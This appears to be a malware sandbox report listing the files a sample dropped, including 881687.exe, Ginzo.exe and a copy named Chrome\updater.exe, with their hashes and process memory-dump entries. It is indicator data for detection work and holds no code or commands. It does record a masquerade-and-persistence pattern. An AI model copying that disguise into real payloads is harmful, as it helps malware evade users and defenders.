Downloads

C:\Users\Admin\AppData\Local\881687.exe
Filesize
4.2MB

MD5
8268ff95b3aaea6d6de8f02a73c323d2

SHA1
ae470145c4f5780315b52aa1c57ae0c04a2d18ca

SHA256
529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8

SHA512
9603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0

Download Submit
C:\Users\Admin\AppData\Local\881687.exe
Filesize
4.2MB

MD5
8268ff95b3aaea6d6de8f02a73c323d2

SHA1
ae470145c4f5780315b52aa1c57ae0c04a2d18ca

SHA256
529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8

SHA512
9603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
Filesize
443B

MD5
8add56521ef894ef0c66ecd3e989d718

SHA1
2058aa5185fd5dcce7263bef8fe35bf5e12dbc7f

SHA256
01bcb6c8348b83208a7c923fd840130a0bc7b3a188b62ad8e270a296ed94b724

SHA512
af99971664282617c18db6a27ddb3bf57eaa291d79ef66828319de3eb38533cc813f7d322cc4c9e687aa90b5c91b7874ed8e725c3cfe35e139e0581492caefb2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
6d42b6da621e8df5674e26b799c8e2aa

SHA1
ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

SHA256
5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

SHA512
53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

Download Submit
C:\Users\Admin\AppData\Local\Temp\2.exe
Filesize
365KB

MD5
48f7091e08fcc58eeb7bb58f2850f1d3

SHA1
b73bbab490536322aab131e8aaa1e391bcce1ffd

SHA256
f079eafd4b372fda5000c834c2c88e0d4146a046c02a01be6874f3c9ca0cc70b

SHA512
1150c4d5d36d5a48ec3655b4195520d9facecdea1752f296dbb2935df5e226dbca712cee2c2dda07e28b9b261f09e82e9c10c1a381c240e491b896a6e93bd58f

Download Submit
C:\Users\Admin\AppData\Local\Temp\2.exe
Filesize
365KB

MD5
48f7091e08fcc58eeb7bb58f2850f1d3

SHA1
b73bbab490536322aab131e8aaa1e391bcce1ffd

SHA256
f079eafd4b372fda5000c834c2c88e0d4146a046c02a01be6874f3c9ca0cc70b

SHA512
1150c4d5d36d5a48ec3655b4195520d9facecdea1752f296dbb2935df5e226dbca712cee2c2dda07e28b9b261f09e82e9c10c1a381c240e491b896a6e93bd58f

Download Submit
C:\Users\Admin\AppData\Local\Temp\DotNetZip.dll
Filesize
461KB

MD5
a999d7f3807564cc816c16f862a60bbe

SHA1
1ee724daaf70c6b0083bf589674b6f6d8427544f

SHA256
8e9c0362e9bfb3c49af59e1b4d376d3e85b13aed0fbc3f5c0e1ebc99c07345f3

SHA512
6f1f73314d86ae324cc7f55d8e6352e90d4a47f0200671f7069daa98592daaceea34cf89b47defbecdda7d3b3e4682de70e80a5275567b82aa81b002958e4414

Download Submit
C:\Users\Admin\AppData\Local\Temp\DotNetZip.dll
Filesize
461KB

MD5
a999d7f3807564cc816c16f862a60bbe

SHA1
1ee724daaf70c6b0083bf589674b6f6d8427544f

SHA256
8e9c0362e9bfb3c49af59e1b4d376d3e85b13aed0fbc3f5c0e1ebc99c07345f3

SHA512
6f1f73314d86ae324cc7f55d8e6352e90d4a47f0200671f7069daa98592daaceea34cf89b47defbecdda7d3b3e4682de70e80a5275567b82aa81b002958e4414

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ginzo.exe
Filesize
184KB

MD5
edd119f3785ff7cccb510298dbbfb727

SHA1
66bb31075d1d1d2a65b9cfe432a903a2275d4cd6

SHA256
3052ac913610c1c75b357fc204c5c3025eda1cda7ed696bfea62be7f2718dab9

SHA512
831bdc28dbd8e26ea96b4284d1c31f48aabb70cf5b02e4e269597cd86597c8aa317e77edf27de19bac54f87b5aa2b7a213796f943fefbc89704e1f059eeb8a1c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ginzo.exe
Filesize
184KB

MD5
edd119f3785ff7cccb510298dbbfb727

SHA1
66bb31075d1d1d2a65b9cfe432a903a2275d4cd6

SHA256
3052ac913610c1c75b357fc204c5c3025eda1cda7ed696bfea62be7f2718dab9

SHA512
831bdc28dbd8e26ea96b4284d1c31f48aabb70cf5b02e4e269597cd86597c8aa317e77edf27de19bac54f87b5aa2b7a213796f943fefbc89704e1f059eeb8a1c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Newtonsoft.Json.dll
Filesize
685KB

MD5
081d9558bbb7adce142da153b2d5577a

SHA1
7d0ad03fbda1c24f883116b940717e596073ae96

SHA256
b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3

SHA512
2fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511

Download Submit
C:\Users\Admin\AppData\Local\Temp\Newtonsoft.Json.dll
Filesize
685KB

MD5
081d9558bbb7adce142da153b2d5577a

SHA1
7d0ad03fbda1c24f883116b940717e596073ae96

SHA256
b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3

SHA512
2fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511

Download Submit
C:\Users\Admin\AppData\Local\Temp\System.Data.SQLite.dll
Filesize
384KB

MD5
55c797383dbbbfe93c0fe3215b99b8ec

SHA1
1b089157f3d8ae64c62ea15cdad3d82eafa1df4b

SHA256
5fac5a9e9b8bbdad6cf661dbf3187e395914cd7139e34b725906efbb60122c0d

SHA512
648a7da0bcda6ccd31b4d6cdc1c90c3bc3c11023fcceb569f1972b8f6ab8f92452d1a80205038edcf409669265b6756ba0da6b1a734bd1ae4b6c527bbebb8757

Download Submit
C:\Users\Admin\AppData\Local\Temp\System.Data.SQLite.dll
Filesize
384KB

MD5
55c797383dbbbfe93c0fe3215b99b8ec

SHA1
1b089157f3d8ae64c62ea15cdad3d82eafa1df4b

SHA256
5fac5a9e9b8bbdad6cf661dbf3187e395914cd7139e34b725906efbb60122c0d

SHA512
648a7da0bcda6ccd31b4d6cdc1c90c3bc3c11023fcceb569f1972b8f6ab8f92452d1a80205038edcf409669265b6756ba0da6b1a734bd1ae4b6c527bbebb8757

Download Submit
C:\Users\Admin\AppData\Local\Temp\x86\SQLite.Interop.dll
Filesize
1.3MB

MD5
8be215abf1f36aa3d23555a671e7e3be

SHA1
547d59580b7843f90aaca238012a8a0c886330e6

SHA256
83f332ea9535814f18be4ee768682ecc7720794aedc30659eb165e46257a7cae

SHA512
38cf4aea676dacd2e719833ca504ac8751a5fe700214ff4ac2b77c0542928a6a1aa3780ed7418387affed67ab6be97f1439633249af22d62e075c1cdfdf5449b

Download Submit
C:\Users\Admin\AppData\Roaming\Chrome\updater.exe
Filesize
4.2MB

MD5
8268ff95b3aaea6d6de8f02a73c323d2

SHA1
ae470145c4f5780315b52aa1c57ae0c04a2d18ca

SHA256
529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8

SHA512
9603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0

Download Submit
C:\Users\Admin\AppData\Roaming\Chrome\updater.exe
Filesize
4.2MB

MD5
8268ff95b3aaea6d6de8f02a73c323d2

SHA1
ae470145c4f5780315b52aa1c57ae0c04a2d18ca

SHA256
529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8

SHA512
9603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0

Download Submit
memory/60-171-0x0000000000000000-mapping.dmp

Download
memory/220-156-0x0000000000000000-mapping.dmp

Download
memory/392-176-0x0000000000000000-mapping.dmp

Download
memory/456-216-0x0000000000000000-mapping.dmp

Download
memory/556-169-0x0000000000000000-mapping.dmp

Download
memory/568-204-0x0000000000000000-mapping.dmp

Download
memory/608-188-0x0000000000000000-mapping.dmp

Download
memory/828-161-0x0000000000000000-mapping.dmp

Download
memory/1048-168-0x0000000000000000-mapping.dmp

Download
memory/1092-187-0x0000000000000000-mapping.dmp

Download
memory/1208-203-0x0000000000000000-mapping.dmp

Download
memory/1344-189-0x0000000000000000-mapping.dmp

Download
memory/1360-228-0x0000000000000000-mapping.dmp

Download
memory/1392-170-0x0000000000000000-mapping.dmp

Download
memory/1404-160-0x00007FF8BF3F0000-0x00007FF8BFEB1000-memory.dmp

Filesize
10.8MB

Download
memory/1404-159-0x000002B3315E0000-0x000002B331A1E000-memory.dmp

Filesize
4.2MB

Download
memory/1424-194-0x0000000000000000-mapping.dmp

Download
memory/1448-177-0x0000000000000000-mapping.dmp

Download
memory/1552-218-0x0000000000000000-mapping.dmp

Download
memory/1572-179-0x0000000000000000-mapping.dmp

Download
memory/1732-139-0x0000000004AC0000-0x0000000004B52000-memory.dmp

Filesize
584KB

Download
memory/1732-137-0x0000000000080000-0x00000000000E2000-memory.dmp

Filesize
392KB

Download
memory/1732-138-0x0000000005070000-0x0000000005614000-memory.dmp

Filesize
5.6MB

Download
memory/1732-130-0x0000000000000000-mapping.dmp

Download
memory/1732-140-0x0000000004A90000-0x0000000004A9A000-memory.dmp

Filesize
40KB

Download
memory/1760-173-0x0000000000000000-mapping.dmp

Download
memory/1932-183-0x0000000000000000-mapping.dmp

Download
memory/1960-229-0x0000000000000000-mapping.dmp

Download
memory/2000-184-0x0000000000000000-mapping.dmp

Download
memory/2044-167-0x0000000000000000-mapping.dmp

Download
memory/2052-234-0x0000000000000000-mapping.dmp

Download
memory/2092-209-0x0000000000000000-mapping.dmp

Download
memory/2112-193-0x0000000000000000-mapping.dmp

Download
memory/2176-225-0x0000000000000000-mapping.dmp

Download
memory/2232-233-0x0000000000000000-mapping.dmp

Download
memory/2388-165-0x0000000000000000-mapping.dmp

Download
memory/2396-219-0x0000000000000000-mapping.dmp

Download
memory/2684-221-0x0000000000000000-mapping.dmp

Download
memory/2756-190-0x0000000000000000-mapping.dmp

Download
memory/2804-213-0x00007FF8C0760000-0x00007FF8C1221000-memory.dmp

Filesize
10.8MB

Download
memory/2804-210-0x0000000000000000-mapping.dmp

Download
memory/3028-214-0x0000000000000000-mapping.dmp

Download
memory/3032-181-0x0000000000000000-mapping.dmp

Download
memory/3216-191-0x0000000000000000-mapping.dmp

Download
memory/3292-175-0x0000000000000000-mapping.dmp

Download
memory/3440-199-0x0000000000000000-mapping.dmp

Download
memory/3480-151-0x0000000009420000-0x000000000945C000-memory.dmp

Filesize
240KB

Download
memory/3480-152-0x000000000A200000-0x000000000A266000-memory.dmp

Filesize
408KB

Download
memory/3480-144-0x00000000062C0000-0x0000000006310000-memory.dmp

Filesize
320KB

Download
memory/3480-148-0x0000000006A40000-0x0000000006AA2000-memory.dmp

Filesize
392KB

Download
memory/3480-149-0x0000000009150000-0x0000000009312000-memory.dmp

Filesize
1.8MB

Download
memory/3480-145-0x00000000064E0000-0x0000000006502000-memory.dmp

Filesize
136KB

Download
memory/3480-136-0x0000000000A00000-0x0000000000A38000-memory.dmp

Filesize
224KB

Download
memory/3480-143-0x0000000006430000-0x00000000064E0000-memory.dmp

Filesize
704KB

Download
memory/3480-133-0x0000000000000000-mapping.dmp

Download
memory/3480-155-0x000000000A270000-0x000000000A2EA000-memory.dmp

Filesize
488KB

Download
memory/3500-178-0x0000000000000000-mapping.dmp

Download
memory/3512-232-0x0000000000000000-mapping.dmp

Download
memory/3588-195-0x0000000000000000-mapping.dmp

Download
memory/3636-224-0x0000000000400000-0x0000000000417000-memory.dmp

Filesize
92KB

Download
memory/3636-222-0x0000000000401BEA-mapping.dmp

Download
memory/3636-220-0x0000000000400000-0x0000000000417000-memory.dmp

Filesize
92KB

Download
memory/3948-235-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/3948-236-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/3948-237-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/3948-238-0x0000000000390000-0x00000000003B0000-memory.dmp

Filesize
128KB

Download
memory/3956-166-0x0000000000000000-mapping.dmp

Download
memory/4000-217-0x0000000000000000-mapping.dmp

Download
memory/4004-180-0x0000000000000000-mapping.dmp

Download
memory/4080-172-0x0000000000000000-mapping.dmp

Download
memory/4132-182-0x0000000000000000-mapping.dmp

Download
memory/4304-162-0x0000000000000000-mapping.dmp

Download
memory/4304-163-0x000002A1D2010000-0x000002A1D2032000-memory.dmp

Filesize
136KB

Download
memory/4304-164-0x00007FF8BF3F0000-0x00007FF8BFEB1000-memory.dmp

Filesize
10.8MB

Download
memory/4344-186-0x0000000000000000-mapping.dmp

Download
memory/4360-185-0x0000000000000000-mapping.dmp

Download
memory/4496-215-0x0000000000000000-mapping.dmp

Download
memory/4532-231-0x0000000000000000-mapping.dmp

Download
memory/4568-226-0x0000000000000000-mapping.dmp

Download
memory/4660-197-0x0000000000000000-mapping.dmp

Download
memory/4684-200-0x0000000000000000-mapping.dmp

Download
memory/4692-201-0x0000000000000000-mapping.dmp

Download
memory/4824-227-0x000001F1C0A30000-0x000001F1C0A42000-memory.dmp

Filesize
72KB

Download
memory/4824-208-0x00007FF8C0760000-0x00007FF8C1221000-memory.dmp

Filesize
10.8MB

Download
memory/4940-192-0x0000000000000000-mapping.dmp

Download
memory/4948-174-0x0000000000000000-mapping.dmp

Download
memory/4952-202-0x0000000000000000-mapping.dmp

Download
memory/5004-230-0x0000000000000000-mapping.dmp

Download
memory/5040-198-0x0000000000000000-mapping.dmp

Download
memory/5096-196-0x0000000000000000-mapping.dmp

Download